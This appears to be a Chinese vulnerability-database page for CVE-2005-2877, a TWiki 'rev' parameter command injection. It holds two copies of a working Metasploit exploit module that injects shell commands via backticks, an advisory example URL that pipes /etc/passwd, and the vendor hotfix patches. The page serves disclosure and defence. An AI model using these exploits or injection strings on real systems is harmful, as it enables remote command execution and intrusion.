CVE-2005-2877
CVSS7.5
发布时间 :2005-09-16 16:03:00
修订时间 :2016-10-17 23:31:03
NMCOEPS    

[原文]The history (revision control) function in TWiki 02-Sep-2004 and earlier allows remote attackers to execute arbitrary code via shell metacharacters, as demonstrated via the rev parameter to TWikiUsers.


[CNNVD]TWiki TWikiUsers INCLUDE函数远程执行任意命令漏洞(CNNVD-200509-146)

        TWiki是一款灵活易用、功能强大的企业协作平台。
        TWiki INCLUDE函数允许恶意用户创建Perl反引号(``)运算符可以执行的命令行,攻击者可以使用特制的URI通过shell执行任意命令。
        由于没有正确的对shell元字符检查INCLUDE变量的rev参数,因此TWiki受包含有管道和shell命令的修改编号的影响。所有使用TWiki::Func::readTopicText函数读取之前主题修改的插件和附加组件都受这个漏洞的影响,如TWiki:Plugins.RevCommentPlugin和TWiki:Plugins.CompareRevisionsAddon。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:twiki:twiki:2001-12-01
cpe:/a:twiki:twiki:2000-12-01
cpe:/a:twiki:twiki:2003-02-01
cpe:/a:twiki:twiki:2004-09-02
cpe:/a:twiki:twiki:2004-09-01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2877
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2877
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-146
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112680475417550&w=2
(UNKNOWN)  BUGTRAQ  20050914 TWiki Remote Command Execution Vulnerability
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
(VENDOR_ADVISORY)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
http://www.kb.cert.org/vuls/id/757181
(VENDOR_ADVISORY)  CERT-VN  VU#757181
http://www.securityfocus.com/bid/14834
(PATCH)  BID  14834

- 漏洞信息

TWiki TWikiUsers INCLUDE函数远程执行任意命令漏洞
高危 输入验证
2005-09-16 00:00:00 2006-01-19 00:00:00
远程  
        TWiki是一款灵活易用、功能强大的企业协作平台。
        TWiki INCLUDE函数允许恶意用户创建Perl反引号(``)运算符可以执行的命令行,攻击者可以使用特制的URI通过shell执行任意命令。
        由于没有正确的对shell元字符检查INCLUDE变量的rev参数,因此TWiki受包含有管道和shell命令的修改编号的影响。所有使用TWiki::Func::readTopicText函数读取之前主题修改的插件和附加组件都受这个漏洞的影响,如TWiki:Plugins.RevCommentPlugin和TWiki:Plugins.CompareRevisionsAddon。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005

- 漏洞信息 (16892)

TWiki History TWikiUsers rev Parameter Command Execution (EDBID:16892)
php webapps
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: twiki_history.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki History TWikiUsers rev Parameter Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the history component of TWiki.
				By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
				script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					'B4dP4nd4',   # original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '2005-2877' ],
					[ 'OSVDB', '19403' ],
					[ 'BID', '14834' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => '',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 14 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
			], self.class)
	end


	#
	# NOTE: This is not perfect, since it requires write access to the bin
	# directory. Unfortunately, detrmining the main directory isn't
	# trivial, or otherwise I would write there (required to be writable
	# per installation steps).
	#
	def check
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev='
		test_url = datastore['URI'] + '/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 404)
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 500)
			return Exploit::CheckCode::Safe
		end

		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		rev = rand_text_numeric(1+rand(5))
		rev << ' `' + payload.encoded + '`#'
		query_str = datastore['URI'] + '/view/Main/TWikiUsers'
		query_str << '?rev='
		query_str << Rex::Text.uri_encode(rev)

		res = send_request_cgi({
				'method'    => 'GET',
				'uri'	      => query_str,
			}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
		

- 漏洞信息 (F86538)

TWiki History TWikiUsers rev Parameter Command Execution (PacketStormID:F86538)
2010-02-23 00:00:00
B4dP4nd4  metasploit.com
exploit,arbitrary,shell
CVE-2005-2877
[点击下载]

This Metasploit module exploits a vulnerability in the history component of TWiki. By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

##
# $Id: twiki_history.rb 8578 2010-02-21 20:31:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki History TWikiUsers rev Parameter Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the history component of TWiki.
				By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers 
				script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					'B4dP4nd4',   # original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8578 $',
			'References'     =>
				[
					[ 'CVE', '2005-2877' ],
					[ 'OSVDB', '19403' ],
					[ 'BID', '14384' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => '',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 14 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
				], self.class)
	end


	#
	# NOTE: This is not perfect, since it requires write access to the bin
	# directory. Unfortunately, detrmining the main directory isn't
	# trivial, or otherwise I would write there (required to be writable
	# per installation steps).
	#
	def check
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev='
		test_url = datastore['URI'] + '/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 404)
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 500)
			return Exploit::CheckCode::Safe
		end
		
		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		rev = rand_text_numeric(1+rand(5))
		rev << ' `' + payload.encoded + '`#'
		query_str = datastore['URI'] + '/view/Main/TWikiUsers'
		query_str << '?rev='
		query_str << Rex::Text.uri_encode(rev)

		res = send_request_cgi({
			'method'    => 'GET',
			'uri'	      => query_str,
		}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
    

- 漏洞信息 (F40104)

twikivuln.txt (PacketStormID:F40104)
2005-09-20 00:00:00
B4dP4nd4  twiki.org
advisory,remote
CVE-2005-2877
[点击下载]

TWiki up to and including TWikiRelease02Sep2004 is vulnerable to remote command execution in the revision control function. Detailed exploitation provided.

This advisory alerts you of a potential security issue with your
TWiki installation: The TWiki history function allows arbitrary
shell command execution. The permanent place for this advisory is
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev .
Please see updates and follow-up on that topic.

If you do not use TWiki, please ignore this e-mail. If you don't
administer your TWiki site, or started a site now administered by
someone else, please pass it to the current TWiki site administrator.

Table of Contents:

  * Vulnerable Software Version
  * Attack Vectors
  * Impact
  * MITRE Name for this Vulnerability
  * Details
  * Countermeasures
  * Authors and Credits
  * Hotfix
     * Patch for TWiki Production Release 01-Sep-2004 and 02-Sep-2004
     * Patch for TWiki Production Release 01-Feb-2003
     * Patch for TWiki Production Release 01-Dec-2001
     * Patch for TWiki Production Release 01-Dec-2000
  * TWiki News


---++ Vulnerable Software Version

  * TWikiRelease02Sep2004[2] -- TWiki20040902.zip
  * TWikiRelease01Sep2004[3] -- TWiki20040901.zip
  * TWikiRelease01Feb2003[4] -- TWiki20030201.zip
  * TWikiRelease01Dec2001[5] -- TWiki20011201.zip
  * TWikiRelease01Dec2000[6] -- TWiki20001201.zip

Not affected are:
  * Recent DakarReleases[7] (upcoming production release, soon)
  * TWikiRelease01Sep2004 patched with Florian Weimer's
    UncoordinatedSecurityAlert23Feb2005[8]


---++ Attack Vectors

HTTP GET requests towards the Wiki server (typically port 80/TCP).
Usually, no prior authentication is necessary.

Possibly also HTTP POST, but this is untested.


---++ Impact

An attacker is able to execute arbitrary shell commands with the
privileges of the web server process, such as user nobody.


---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the
name CAN-2005-2877 to this vulnerability.


---++ Details

The TWiki revision control function uses a user supplied URL
parameter to compose a command line executed by the Perl backtick
(``) operator.

The URL parameter is not checked properly for shell metacharacters
and is thus vulnerable to revision numbers containing pipes and
shell commands. Exploit is possible on topics with two or more
revisions.

Example URL path with exploited rev parameter:
/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd

If access to TWiki is not restricted by other means, attackers can
use the revision function without prior authentication.

See Also: SecurityAlertExecuteCommandsWithSearch[9] and
UncoordinatedSecurityAlert23Feb2005[8]


---++ Countermeasures

  * Apply hotfix (see patches below)
     * NOTE: The hotfix is known to prevent the current attacks,
       but it might not be a complete fix
  * Upgrade to the latest patched production TWikiRelease03Sep2004[1]
     * NOTE: If you are running an *unmodified*
       TWikiRelease02Sep2004[2], simply copy the patched
       lib/TWiki/Store.pm, lib/TWiki/UI/RDiff.pm,
       lib/TWiki/UI/View.pm and lib/TWiki/UI/Viewfile.pm to your
       installation
  * Apply patch of UncoordinatedSecurityAlert23Feb2005[6] (but see
    known issues of that patch)
  * Filter access to the web server
  * Use the web server software to restrict access to the web pages
    served by TWiki


---++ Authors and Credits

  * Credit to B4dP4nd4 (b4dp4nd4@gmail.com) for disclosing the issue
    to the twiki-security@lists.sourceforge.net mailing list
  * PeterThoeny, CrawfordCurrie, SvenDowideit, ColasNahaboo,
    WillNorris, RichardDonkin, B4dP4nd4 and Florian Weimer for
    contributing to this advisory


---++ Hotfix

---+++ Patch for TWiki Production Release 01-Sep-2004 and 02-Sep-2004

Affected files: =twiki/lib/TWiki/Store.pm=, =twiki/lib/TWiki/UI/RDiff.pm=,
=twiki/lib/TWiki/UI/View.pm=, =twiki/lib/TWiki/UI/Viewfile.pm=

See also attached patch file TWiki200409-02-03.patch

--- lib/TWiki/Store.pm.orig Thu Jul 22 01:43:40 2004
+++ lib/TWiki/Store.pm      Thu Sep  8 21:30:44 2005
@@ -572,7 +572,9 @@
    }

    $theRev = "" unless( $theRev );
-    $theRev =~ s/^1\.//o;
+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );

    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );
--- lib/TWiki/UI/RDiff.pm.orig      Sun Aug  8 01:28:45 2004
+++ lib/TWiki/UI/RDiff.pm   Thu Sep  8 21:33:13 2005
@@ -409,6 +409,9 @@
    if( ! $rev2 ) { $rev2 = 0; }
    $rev1 =~ s/r?1\.//go;  # cut 'r' and major
    $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+    $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
    if( $rev1 < 1 )       { $rev1 = $maxrev; }
    if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
    if( $rev2 < 1 )       { $rev2 = 1; }
--- lib/TWiki/UI/View.pm.orig       Tue Aug 24 23:36:15 2004
+++ lib/TWiki/UI/View.pm    Thu Sep  8 21:34:52 2005
@@ -107,6 +107,8 @@

    if( $rev ) {
      $rev =~ s/r?1\.//go;  # cut 'r' and major
+      # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+      $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
      if( $rev < 1 )       { $rev = 1; }
      if( $rev > $maxrev ) { $rev = $maxrev; }
    } else {
--- lib/TWiki/UI/Viewfile.pm.orig   Fri May 28 23:51:35 2004
+++ lib/TWiki/UI/Viewfile.pm        Thu Sep  8 21:35:59 2005
@@ -43,6 +43,9 @@

  my $fileName = $query->param( 'filename' );
  my $rev = $query->param( 'rev' ) || "";
+  $rev =~ s/r?1\.//o;  # cut 'r' and major
+  # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+  $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );

  return unless TWiki::UI::webExists( $webName, $topic );



---+++ Patch for TWiki Production Release 01-Feb-2003

Affected files: =twiki/lib/TWiki/Store.pm=, =twiki/bin/rdiff=,
=twiki/bin/view=, =twiki/bin/viewfile=

--- lib/TWiki/Store.pm.orig     Sat Jan  4 17:36:56 2003
+++ lib/TWiki/Store.pm  Thu Sep  8 23:10:58 2005
@@ -351,9 +351,11 @@
    if( ! $theWebName ) {
        $theWebName = $TWiki::webName;
    }
-
-    $theRev =~ s/^1\.//o;

+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );
+
    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );

--- bin/rdiff.orig      Sat Feb  1 00:57:32 2003
+++ bin/rdiff   Thu Sep  8 23:18:05 2005
@@ -155,6 +155,9 @@
        if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/r?1\.//go;  # cut 'r' and major
        $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Thu Jan 30 00:21:25 2003
+++ bin/view    Thu Sep  8 23:13:47 2005
@@ -123,6 +123,8 @@
        writeDebug( "maxrev = $maxrev" );
        if( $rev ) {
            $rev =~ s/r?1\.//go;  # cut 'r' and major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
        } else {
--- bin/viewfile.orig   Sun Jan  5 00:36:54 2003
+++ bin/viewfile        Thu Sep  8 23:14:54 2005
@@ -63,6 +63,9 @@
    my $fileName = $query->param( 'filename' );

    my $rev = $query->param( 'rev' ) || "";
+    $rev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );
    my $topRev = &TWiki::Store::getRevisionNumber( $webName, $topic,
$fileName );

    if( ( $rev ) && ( $rev ne $topRev ) ) {


---+++ Patch for TWiki Production Release 01-Dec-2001

Affected files: =twiki/bin/rdiff=, =twiki/bin/view=, =twiki/bin/viewfile=

--- bin/rdiff.orig      Tue Nov 13 18:59:02 2001
+++ bin/rdiff   Thu Sep  8 23:51:50 2005
@@ -149,6 +149,9 @@
        if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/r?1\.//go;  # cut 'r' and major
        $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Mon Dec  3 09:11:20 2001
+++ bin/view    Thu Sep  8 23:52:57 2005
@@ -114,6 +114,8 @@
        writeDebug( "maxrev = $maxrev" );
        if( $rev ) {
            $rev =~ s/r?1\.//go;  # cut 'r' and major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
        } else {
--- bin/viewfile.orig   Fri Oct  5 18:03:20 2001
+++ bin/viewfile        Thu Sep  8 23:53:45 2005
@@ -62,6 +62,9 @@
    my $fileName = $query->param( 'filename' );

    my $rev = $query->param( 'rev' ) || "";
+    $rev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );
    my $topRev = &TWiki::Store::getRevisionNumber( $webName, $topic,
$fileName );

    if( ( $rev ) && ( $rev ne $topRev ) ) {


---+++ Patch for TWiki Production Release 01-Dec-2000

Affected files: =twiki/bin/rdiff=, =twiki/bin/view=

--- bin/rdiff.orig      Tue Nov 14 23:08:48 2000
+++ bin/rdiff   Fri Sep  9 00:04:25 2005
@@ -139,6 +139,9 @@
       if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/1\.//go;  # cut major
        $rev2 =~ s/1\.//go;  # cut major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Tue Nov 14 23:14:31 2000
+++ bin/view    Fri Sep  9 00:05:10 2005
@@ -77,6 +77,8 @@
       $maxrev =~ s/1\.//go;  # cut major
       if( $rev ) {
            $rev =~ s/1\.//go;  # cut major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
            $text= &wiki::readVersion( $topic, "1.$rev" );


---++ TWiki News

  * A new TWiki release is upcoming soon, code named DakarRelease[7]
  * To customize your TWiki installation, TWiki.org offers now
    177 Plugin packages[11], 56 Add-on packages[10], 30 Skin
    packages[12], and 11 TWiki contrib packages [13]
  * Codev.TWikiSecurityAlertProcess[14] documents our security
    process
  * Wikis and TWiki get covered more my the press[15]
  * TWiki is represented at the International Symposium on Wikis[16]
    in San Diego, 17-18 Oct 2005
  * A new book on Wikis in the Workplace is in work[17]

Best regards,
Peter


[1]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease03Sep2004
[2]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease02Sep2004
[3]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Sep2004
[4]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Feb2003
[5]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Dec2001
[6]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Dec2000
[7]:  http://twiki.org/cgi-bin/view/Codev/DakarReleases
[8]:  http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005
[9]:  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
[10]: http://twiki.org/cgi-bin/view/Plugins/AddOnPackage
[11]: http://twiki.org/cgi-bin/view/Plugins/PluginPackage
[12]: http://twiki.org/cgi-bin/view/Plugins/SkinPackage
[13]: http://twiki.org/cgi-bin/view/Plugins/ContribPackage
[14]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[15]: http://twiki.org/cgi-bin/view/Codev/TWikiInTheNews
[16]: http://twiki.org/cgi-bin/view/Codev/InternationalSymposiumOnWikis
[17]: http://twiki.org/cgi-bin/view/Codev/WikisInTheWorkplaceBook


--
  * Peter Thoeny                           Peter@Thoeny.com
  * Is your team already TWiki enabled?    http://TWiki.org
  * This e-mail is:  (x) public  (_) ask first  (_) private

--- ../TWiki20040902/lib/TWiki/Store.pm 2004-07-22 10:43:40.000000000 +0200
+++ lib/TWiki/Store.pm  2005-09-09 06:30:44.000000000 +0200
@@ -572,7 +572,9 @@
    }

    $theRev = "" unless( $theRev );
-    $theRev =~ s/^1\.//o;
+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );

    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );
--- ../TWiki20040902/lib/TWiki/UI/RDiff.pm      2004-08-08
10:28:45.000000000 +0200
+++ lib/TWiki/UI/RDiff.pm       2005-09-09 06:33:13.000000000 +0200
@@ -409,6 +409,9 @@
    if( ! $rev2 ) { $rev2 = 0; }
    $rev1 =~ s/r?1\.//go;  # cut 'r' and major
    $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+    $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
    if( $rev1 < 1 )       { $rev1 = $maxrev; }
    if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
    if( $rev2 < 1 )       { $rev2 = 1; }
--- ../TWiki20040902/lib/TWiki/UI/Viewfile.pm   2004-05-29
08:51:35.000000000 +0200
+++ lib/TWiki/UI/Viewfile.pm    2005-09-09 06:35:59.000000000 +0200
@@ -43,6 +43,9 @@

  my $fileName = $query->param( 'filename' );
  my $rev = $query->param( 'rev' ) || "";
+  $rev =~ s/r?1\.//o;  # cut 'r' and major
+  # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+  $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );

  return unless TWiki::UI::webExists( $webName, $topic );

--- ../TWiki20040902/lib/TWiki/UI/View.pm       2004-08-25
08:36:15.000000000 +0200
+++ lib/TWiki/UI/View.pm        2005-09-09 06:34:52.000000000 +0200
@@ -107,6 +107,8 @@

    if( $rev ) {
      $rev =~ s/r?1\.//go;  # cut 'r' and major
+      # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+      $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
      if( $rev < 1 )       { $rev = 1; }
      if( $rev > $maxrev ) { $rev = $maxrev; }
    } else {
--- ../TWiki20040902/lib/TWiki.pm       2004-11-20 06:31:53.000000000 +0100
+++ lib/TWiki.pm        2005-09-10 03:01:49.000000000 +0200
@@ -154,7 +154,7 @@

 # ===========================
 # TWiki version:
-$wikiversion      = '02 Sep 2004 $Rev: 1742 $';
+$wikiversion      = '03 Sep 2004 $Rev: 1742 $';

 # ===========================
 # Key Global variables, required for writeDebug
--- ../TWiki20040902/license.txt        2004-11-20 06:31:10.000000000 +0100
+++ license.txt 2005-09-10 03:04:46.000000000 +0200
@@ -1,4 +1,4 @@
-Copyright and License of TWiki, 02 Sep 2004
+Copyright and License of TWiki, 03 Sep 2004
 -------------------------------------------

 TWiki (TM) is copyrighted (C) 1999-2004 by Peter Thoeny,
--- ../TWiki20040902/readme.txt 2004-11-20 06:37:33.000000000 +0100
+++ readme.txt  2005-09-10 03:05:03.000000000 +0200
@@ -5,7 +5,7 @@
 TWiki Distribution
 ------------------

-Version: 02 Sep 2004 $Rev: 1742 $
+Version: 03 Sep 2004 $Rev: 1742 $
 Release type: Production release

 This version is TWiki Release 01-Sep-2004 patched for
--- ../TWiki20040902/TWikiDocumentation.html    2004-08-31
18:35:18.000000000 +0200
+++ TWikiDocumentation.html     2005-09-10 03:09:15.000000000 +0200
@@ -1,7 +1,7 @@
 <html><head>
 <title>TWikiDocumentation</title>
 </head><body bgcolor="#ffffff">
-<h1><a name="TWiki_Reference_Manual_01_Sep_20"> </a><a
name="_TWiki_Reference_Manual_01_Sep_2"> </a>  TWiki Reference Manual
(01 Sep 2004 $Rev: 1742 $) </h1>
+<h1><a name="TWiki_Reference_Manual_03_Sep_20"> </a><a
name="_TWiki_Reference_Manual_03_Sep_2"> </a>  TWiki Reference Manual
(03 Sep 2004 $Rev: 1742 $) </h1>
 <p />
 <script type="text/javascript">
 <!--
@@ -3816,7 +3816,7 @@
 </li>
 </ul>
 <p />
-This version of TWiki - 01 Sep 2004 $Rev: 1742 $ - expands the
following variables (enclosed in <code><b>%</b></code> percent signs):
+This version of TWiki - 03 Sep 2004 $Rev: 1742 $ - expands the
following variables (enclosed in <code><b>%</b></code> percent signs):
 <p />
 <p />
 <p />
@@ -4627,7 +4627,7 @@
 <ul>
 <li> Syntax: <code>%WIKIVERSION%</code>
 </li>
-<li> Expands to: <code>01 Sep 2004 $Rev: 1742 $</code>
+<li> Expands to: <code>03 Sep 2004 $Rev: 1742 $</code>
 </li>
 <li> Related: <a class="twikiAnchorLink"
href="#VarPLUGINVERSION">PLUGINVERSION</a>, <a class="twikiAnchorLink"
href="#VarWIKITOOLNAME">WIKITOOLNAME</a>
 </li>
@@ -9836,4 +9836,4 @@
 </li>
 </ul>
 <p />
-</body></html>
\ No newline at end of file
+</body></html>
    

- 漏洞信息

19403
TWiki rev Parameter Arbitrary Command Injection
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

